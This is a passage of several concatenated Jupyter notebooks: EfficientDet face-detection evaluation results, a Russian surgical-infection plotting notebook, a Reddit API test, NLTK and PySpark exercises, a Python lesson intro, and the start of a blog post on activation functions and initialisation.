maxDets=100 ] = 0.600 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.339 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.198 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.641 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.722 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.060 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.228 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.387 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.260 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.703 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.789 # ``` # # + [markdown] id="1fmXxZz23UDs" # *Results* after **51 epochs** # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.338 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.610 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.340 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.208 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.628 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.696 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.059 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.224 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.393 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.273 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.693 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.767 # ``` # # + [markdown] id="WPvRtvCLl0wn" # *Results* after **61 epochs** # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.342 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.617 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.341 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.210 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.633 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.700 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.059 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.226 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.394 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.274 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.696 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.763 # ``` # # + [markdown] id="bX7wcWqomCyN" # *Results* after **87 epochs** # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.345 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.616 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.347 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.217 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.636 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.701 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.059 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.229 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.400 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.279 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.705 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.772 # # ``` # # + [markdown] id="j9HpFh-0FKas" # Results after **179 epochs** # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.345 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.628 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.345 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.224 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.611 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.684 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.058 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.226 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.404 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.292 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.685 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.753 # ``` # # + [markdown] id="RW26DwfirQQN" # # 2. COCO evaluation # + [markdown] id="cfn_tRFOWKMO" # ## 2.1 COCO evaluation on validation set. # + id="Xbc_l-qxDkat" file_pattern_v = 'wider_val-*-of-00040.tfrecord' # !python main.py --mode=eval \ # --validation_file_pattern=tfrecord/{file_pattern_v} \ # --model_name={MODEL} \ # --model_dir='{OUTPUT_DIR}/model_dir/{MODEL}-finetune/archive' \ # --ckpt={MODEL} \ # --eval_batch_size=8 --eval_samples=3224 \ # --hparams="num_classes=2,moving_average_decay=0,mixed_precision=false, max_instances_per_image=2000, grad_checkpoint=True" # + [markdown] id="Qg8NpsVMDkax" # Results after 179. epoch # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.345 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.628 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.345 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.224 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.611 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.684 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.058 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.226 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.404 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.292 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.685 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.753 # ``` # # + [markdown] id="mDp_acD1pUcx" # ## 2.2 Model evaluation on Faces_DD dataset. Hi-res # + id="prR2uqeIv5-x" # !mkdir tfrecord # !PYTHONPATH=".:$PYTHONPATH" python dataset/create_faces_tfrecord.py \ # --data_dir='' --output_path=tfrecord/faces # + id="bd3Exa-sv5-2" colab={"base_uri": "https://localhost:8080/"} outputId="bd899495-2974-4644-fe13-ebe69067197c" # Faces_DD has 925 train images with 25 shards epoch, here we use a single shard # for demo, but users should use all shards pascal-*-of-00100.tfrecord. file_pattern_face = 'faces-*-of-00025.tfrecord' # images_per_epoch = 37 * len(tf.io.gfile.glob('tfrecord/' + file_pattern_face)) images_per_epoch = images_per_epoch // 8*8 # round to 8. print('images_per_epoch = {}'.format(images_per_epoch)) # + id="Jvx_8pJGEs8C" # generating train tfrecord is large, so we skip the execution here. import os # key option: use --ckpt # !python main.py --mode=eval \ # --validation_file_pattern=tfrecord/{file_pattern_face} \ # --model_name={MODEL} \ # --model_dir='{OUTPUT_DIR}/model_dir/{MODEL}-finetune/archive' \ # --ckpt={MODEL} \ # --eval_batch_size=8 --eval_samples=920 \ # --hparams="num_classes=2,moving_average_decay=0,mixed_precision=false, grad_checkpoint=True" # + [markdown] id="7DZeaDvdZHNG" # Results on Faces_DD with model **trained 6 epochs** on WiderFace # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.658 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.945 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.786 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.323 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.527 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.713 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.271 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.623 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.735 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.420 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.639 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.783 # ``` # # + [markdown] id="WibIfXdeTUTc" # Results on Faces_DD with model **trained 9 epochs** on WiderFace # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.635 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.941 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.769 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.271 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.511 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.691 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.261 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.604 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.714 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.343 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.620 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.765 # ``` # # # + [markdown] id="2Ox8OWDuZLNb" # Results on Faces_DD with model **trained 13 epochs** on WiderFace # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.649 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.948 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.778 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.332 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.538 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.698 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.265 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.613 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.725 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.422 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.645 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.767 # ``` # # # + [markdown] id="spxEjYPXX1x1" # Results on Faces_DD with model **trained 51 epochs** on WiderFace # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.634 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.949 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.764 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.322 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.546 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.677 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.257 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.601 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.711 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.426 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.651 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.746 # ``` # # # + [markdown] id="lxWYXPgR4w_C" # Results on Faces_DD with model **trained 61** epochs on WiderFace # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.636 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.950 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.764 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.341 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.565 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.676 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.258 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.608 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.721 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.455 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.667 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.754 # ``` # # # + [markdown] id="Wavtp1RcmMIR" # Results on Faces_DD with model **trained 87 epochs** on WiderFace # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.630 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.947 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.743 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.315 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.550 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.674 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.259 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.604 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.714 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.424 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.645 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.752 # ``` # # # + [markdown] id="_EMeC5Q88WIM" # Results on Faces_DD with model **trained 179 epochs** on WiderFace # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.617 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.946 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.739 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.322 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.533 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.659 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.258 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.595 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.699 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.437 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.636 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.733 # ``` # # # + [markdown] id="jGKs3w2_ZXnu" # # 3 Inference images. # # --- # # # + id="-bsmJsz67hTP" # %%capture # first export a saved model. saved_model_dir = 'savedmodel' # !rm -rf {saved_model_dir} # !python model_inspect.py --runmode=saved_model --model_name={MODEL} \ # --ckpt_path='{OUTPUT_DIR}/model_dir/{MODEL}-finetune/archive' \ # --saved_model_dir={saved_model_dir} \ # --hparams="num_classes=2,moving_average_decay=0,mixed_precision=false" # + id="tlh_S6M9ahe5" # Then run saved_model_infer to do inference. # Notably: batch_size, image_size must be the same as when it is exported. serve_image_out = 'serve_image_out' # !mkdir {serve_image_out} #'WIDER/WIDER_val/images/0--Parade/0_Parade_marchingband_1_147.jpg' \ #'WIDER/WIDER_val/images/2--Demonstration/2_Demonstration_Demonstration_Or_Protest_2_441.jpg' \ # !python model_inspect.py --runmode=saved_model_infer \ # --saved_model_dir={saved_model_dir} \ # --model_name={MODEL} \ # --input_image='WIDER/WIDER_val/images/2--Demonstration/2_Demonstration_Demonstration_Or_Protest_2_441.jpg' \ # --output_image_dir={serve_image_out} \ # --min_score_thresh={min_score_thresh} --max_boxes_to_draw={max_boxes_to_draw} # + colab={"base_uri": "https://localhost:8080/", "height": 586} id="7dF0S1aiEYjU" outputId="bd077ce8-78f9-45a3-c857-c50d4f2d2d13" from IPython import display display.display(display.Image(os.path.join(serve_image_out, '0.jpg')))
efficientdet/faces_test_EfficientDet_D4.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + import numpy as np import pandas as pd import seaborn as sns import matplotlib.pyplot as plt from bokeh.palettes import brewer from bokeh.plotting import figure, output_notebook, show from bokeh.models import LabelSet, ColumnDataSource output_notebook() # - # Load data dfx = pd.read_excel('../data/raw/Распространенность.xlsx', header=1, index_col=0) dfx.head(10) dfx_t = dfx.transpose().drop('всего') dfx_t.fillna(0, inplace=True) # using dictionary to convert specific columns convert_dict = {'количество операций': int, 'глубокая': int, 'поверхностная': int, 'нога': int, 'госпитальной ИОХВ всего': int, 'после выписки ИОХВ до 90 дней': int, 'всего': int } dfx_t = dfx_t.astype(convert_dict) df = (dfx_t[[ 'количество операций' , 'поверхностная' , 'нога' , 'глубокая' , 'после выписки ИОХВ до 90 дней' , 'всего' ]] .sort_values('количество операций') ) # + p = figure(x_range=(85, 697), y_range=(0, 50)) p.grid.minor_grid_line_color = '#eeeeee' names = list(df.columns[1:5]) p.varea_stack(stackers=names, x='количество операций', color=brewer['Spectral'][10][0:4], legend_label=names, source=df, alpha=0.9) p.yaxis.axis_label = 'Количество осложнений' p.xaxis.axis_label = 'Количество операций' p.legend.location="top_left" # reverse the legend entries to match the stacked order p.legend.items.reverse() right_side = ColumnDataSource(df[~df.index.isin([2015, 2018])]) left_side = ColumnDataSource(df[df.index.isin([2015, 2018])]) labels_right = LabelSet(x='количество операций', y='всего', text='index', level='annotation', x_offset=0, y_offset=0, source=right_side, render_mode='canvas', text_font_size='8pt') labels_left = LabelSet(x='количество операций', y='всего', text='index', level='annotation', x_offset=-25, y_offset=0, source=left_side, render_mode='canvas', text_font_size='8pt') p.add_layout(labels_right) p.add_layout(labels_left) show(p) # - dfx_t.sort_values('количество операций') df = dfx_t.melt(id_vars=['количество операций'], value_name = 'количество осложнений', value_vars=['глубокая', 'поверхностная', 'нога', 'госпитальной ИОХВ всего', 'после выписки ИОХВ до 90 дней', 'всего']) m = {'глубокая': 'госпитальная', 'поверхностная': 'госпитальная', 'нога': 'госпитальная', 'госпитальной ИОХВ всего': 'госпитальная', 'после выписки ИОХВ до 90 дней': 'после выписки', 'всего': 'всего' } df['Тип инфекции'] = df['показатель'].map(m) # + sns.set_theme(color_codes=True) sns.lmplot(x='количество операций', y='количество осложнений', col='показатель', data=df, hue='Тип инфекции', col_wrap=3, height=4, order=1 ); # + sns.set_theme(color_codes=True) sns.lmplot(x='количество операций', y='количество осложнений', col='показатель', data=df, hue='Тип инфекции', col_wrap=3, height=4, order=2 ); # -
notebooks/09-oskin-spread.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- import requests import requests.auth import csv import time user_agent = "Test/0.1 by maxoboe" def get_access_code(user_agent): with open('account_info.txt', 'r') as file: lines = file.read().splitlines() username = lines[0] password = lines[1] clientID = lines[2] secretID = lines[3] client_auth = requests.auth.HTTPBasicAuth(clientID, secretID) post_data = {"grant_type": "password", "username": username, "password": password} headers = {"User-Agent": user_agent} response = requests.post("https://www.reddit.com/api/v1/access_token", auth=client_auth, data=post_data, headers=headers) return response.json()['access_token'] def try_request(endpoint, access_token, headers, second_try=False): response = requests.get(endpoint, headers=headers) if 'error' in response.json(): if second_try: return access_token, response if response.json()['error'] == 401: access_token = get_access_token(user_agent) return try_request(endpoint, access_token, user_agent,second_try=True) return access_token, response def format_row(child): data = child['data'] title = data['title'] text = data['selftext'] url = data['url'] return {'title':title, 'text': text, 'url':url} access_token = get_access_code(user_agent) headers = {"Authorization": "bearer " + access_token, "User-Agent": user_agent} query = "climate+change" endpoint = "https://oauth.reddit.com/comments/fq2dp/im_skeptical_of_human_caused_global_warming_but/" after = "none" access_token, response = try_request(endpoint, access_token, headers) print(response.json()['data']) # with open('raw_queries.csv', 'w+', encoding='utf-8') as csvfile: # fieldnames = ['title', 'text', 'url'] # writer = csv.DictWriter(csvfile, fieldnames=fieldnames) # writer.writeheader() # while after is not None: # access_token, response = try_request(endpoint + "&after=" + after, # access_token, headers) # after = response.json()['data']['after'] # for child in response.json()['data']['children']: # writer.writerow(format_row(child)) # time.sleep(1.1) #Rate limited to 60 requests per minute # # Do this, but with after = after from first, count = count + 100
reddit-pull/API Test.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + from nltk import word_tokenize line = "the less there is to justify a traditional custom, the harder it is to get rid of it." print("tokens:") tokens = word_tokenize(line) print(tokens) print("-----------") print("remove stop words") from nltk.corpus import stopwords stop_words = stopwords.words('english') words = [w for w in tokens if not w in stop_words] print(words) print("-----------------") print("steming") from nltk.stem.porter import PorterStemmer porter = PorterStemmer() stemmed = [porter.stem(word) for word in words] print(stemmed) # -
Untitled.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + [markdown] slideshow={"slide_type": "slide"} # # Numbers and Math # # ![](https://gifimage.net/wp-content/uploads/2017/10/calculations-gif-6.gif) # + [markdown] slideshow={"slide_type": "slide"} # ## What you'll learn in today's lesson # # - Built in numbers integers, floats, and complex numbers # - Rounding numbers # - e notation # - Arithmetic Operators and Expressions # - Common mathematical functions # - Printing numbers with specific formatting # -
Lecture Material/04_Numbers_and_Math/04.0-Introduction.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # 0. Importing PySpark # + from pyspark import SparkContext from pyspark.sql import SparkSession sc = SparkContext() spark = SparkSession(sc) # run this cell only once # - # # 1. Loading the dataset import csv rdd1 = sc.textFile("digikala_comments.csv")\ .mapPartitions(lambda line: csv.reader(line, delimiter=',', quotechar='"'))\ .filter(lambda line: len(line) >= 2 and line[0] != 'product_id') rdd1.take(1) # # 2. Most popular item rdd1.map(lambda l: (l[0], int(l[4]) - int(l[5])))\ .reduceByKey(lambda v1, v2: v1 + v2)\ .max(key = lambda x: x[1]) # # 3. Percentage of unverified comments total_count = rdd1.count() not_verified_count = rdd1.filter(lambda l: l[6] != 'verified').count() print((not_verified_count / total_count ) * 100) # # 4. The largest word in the comment section rdd1.map(lambda l: l[9].split())\ .flatMap(lambda x: x)\ .map(lambda x: (x, len(x)))\ .reduce(lambda w1, w2: w1 if w1[1] > w2[1] else w2) # # 5. Top 10 words in advantages and disadvantages import ast persian_chars=["آ", "ا", "ب", "پ", "ت", "ث", "ج", "چ", "ح", "خ", "د", "ذ", "ر", "ز", "ژ", "س", "ش", "ص", "ض", "ط", "ظ", "ع", "غ", "ف", "ق", "ک" ,"گ", "ل", "م", "ن", "و" ,"ه", "ی"] def preprocess_words(x): for c in x: if c not in persian_chars: x = x.replace(c, " ") return x def get_top_10_words(column_num): return rdd1.filter(lambda l: l[column_num] != '')\ .map(lambda l: l[column_num])\ .map(preprocess_words)\ .map(lambda x: x.split())\ .flatMap(lambda x: x)\ .map(lambda x: (x, 1))\ .reduceByKey(lambda x, y: x + y)\ .takeOrdered(10, key=lambda x: -x[1]) # Advantages column: # + tags=[] get_top_10_words(10) # - # Disadvantages column: get_top_10_words(11) # # 6. Most popular character in product's title rdd1.map(lambda l: l[1])\ .flatMap(lambda x: x)\ .filter(lambda x: x in persian_chars)\ .map(lambda x: (x, 1))\ .reduceByKey(lambda x, y: x + y)\ .takeOrdered(1, key=lambda x: -x[1])
Homeworks/01. Introduction to Spark/02. Dataset queries using Spark.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="Hh7kOH_zRcEw" colab_type="text" # # "An Overview of Initialization for Deep Neural Networks, Part 1" # # > "Without appropriate choice of activation function and/or smart initialization for it neural networks, especially deep ones, tend to refuse training at all. We will consider sigmoid and tanh activation functions and two initialization methods most suitable for them - LeCun and Xavier (Glorot) initialization." # # - toc: false # - branch: master # - badges: false # - comments: false # - categories: [fastpages, jupyter] # - use_math: true # + [markdown] id="Zk9STjSxfz-Z" colab_type="text" # For the past few years deep neural networks have proven themselves to be able to solve various AI-level tasks effectively. In some very specific tasks, such as image classification, game of Go, autonomous driving, and many others they already perform better than humans. These achievements were not possible without tremendous research invested in study of difficulties that occur during training of deep networks, and methods to overcome them. A part of this progress is due to better non-linearities and initialization methods. # # ## What Is the Choice of Activation Function and Initialization and Why Is It Important? # # # Neural networks are typically trained via stochastic gradient descent or one of its more powerful variants, such as RMSprop or Adam, that use gradients computed by the back propagation algorithm. The back propagation algorithm essentially recursively applies the chain rule of calculus to compute gradients efficiently. Just as a reminder, the chain rule of calculus look like this # # \begin{equation} # \frac{\partial}{\partial x}g(f(x)) = \frac{\partial g}{\partial f} \frac{\partial f}{\partial x} # \end{equation} # # In earlier years folks used sigmoid activation function, defined as # # \begin{equation} # \sigma(x) = \frac{1}{1 + e^{-x}} # \end{equation} # # However, soon it became evident that such nets are hard to train, because of some properties of sigmoid. One such property is the effect of saturation. Look at the graph of sigmoid. # + id="xSVhxtJJeM53" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 337} outputId="8d8dd903-1517-47b1-d019-9af95b02fb04" def sigmoid(x): return 1. / (1. + np.exp(-x)) def sigmoid_derivative(x): return sigmoid(x) * (1. - sigmoid(x)) def plot_activation_and_derivative(activation, derivative, inputs, titles): fig, (ax_f, ax_d) = plt.subplots(1, 2, sharey=True, figsize=(16, 5)) ax_f.plot(inputs, activation(inputs)) ax_f.set_title(titles[0]) ax_d.plot(inputs, derivative(inputs)) ax_d.set_title(titles[1]) plt.show() values = np.arange(-6.0, 6.0, 0.01) plot_activation_and_derivative(sigmoid, sigmoid_derivative, values, ('Sigmoid activation', 'Derivative of sigmoid')) # + [markdown] id="3Bufa3fPnFQ4" colab_type="text" # When input values become large enough (whether positive or negative), output of sigmoid remains roughly unchanged and goes to 1 in case of positive inputs, or to 0 in case of negative. This saturation of sigmoid causes gradient vanishing. Since output values are roughly equal in those saturated tails, the derivative of sigmoid becomes very close to zero. As back propagation progresses towards input layers, gradients get multiplied, and if at least one of multiples becomes close to zero, the whole product is likely to become close to zero as well. Hence it can require too many gradient updates to tweak parameters in right way. Now look at the graph of the derivative of sigmoid more closely. You can note that its maximum value is 0.25 when input value is 0. So, in the best case, gradient gets four times smaller after sigmoid activation during back propagation. # # There is another saturating activation function that, however, suffers less from vanishing gradient problems. It is called hyperbolic tangent, or tanh for short. # # \begin{equation} # \tanh(x) = \frac{e^x - e^{-x}}{e^x + e^{-x}} # \end{equation} # # Actually it can be shown from their definitions that tanh can be expressed in terms of sigmoid as follows # # \begin{equation} # \tanh(x) = 2\sigma(2x) - 1 # \end{equation} # # In spite of that, tanh has two advantages over the sigmoid. First, it is symmetric in the origin, which makes it easier to learn identity function, and second, maximum value of its derivative is 1. # + id="FIpAid-6zDvv" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 337} outputId="7316624f-6f8c-4b46-8fe2-47c2037626a7" def tanh(x): return np.tanh(x) def tanh_derivative(x): return 1. / np.cosh(x) ** 2 plot_activation_and_derivative(tanh, tanh_derivative, values, ('Tanh 